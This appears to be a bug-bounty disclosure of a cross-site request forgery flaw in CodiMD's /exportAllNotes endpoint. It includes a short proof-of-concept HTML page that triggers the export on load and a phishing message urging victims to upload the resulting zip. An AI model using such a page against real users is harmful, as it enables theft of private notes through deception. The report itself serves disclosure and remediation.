Cross-Site Request Forgery (CSRF) in hackmdio/codimd

Valid
Reported on May 23rd 2021

✍️ Description

The /exportAllNotes endpoint does not require any CSRF token validation. This could be used to force download account data and potentially spoof users.

🕵️‍♂️ Proof of Concept

  1. Login to user account.
  2. Create the following file and open the page in browser.

<html>
<body onload='window.open("https://hackmd.io/exportAllNotes");'>
        To verify that you are a human, upload the zip file that has been downloaded from our website now.
</body>
</html>
  1. This downloads user's data from codiMD without user's permission. An attacker can then spoof the user to upload this file into an attacker controlled server.

💥 Impact

Potential private information leakage through phishing by exploiting missing CSRF token.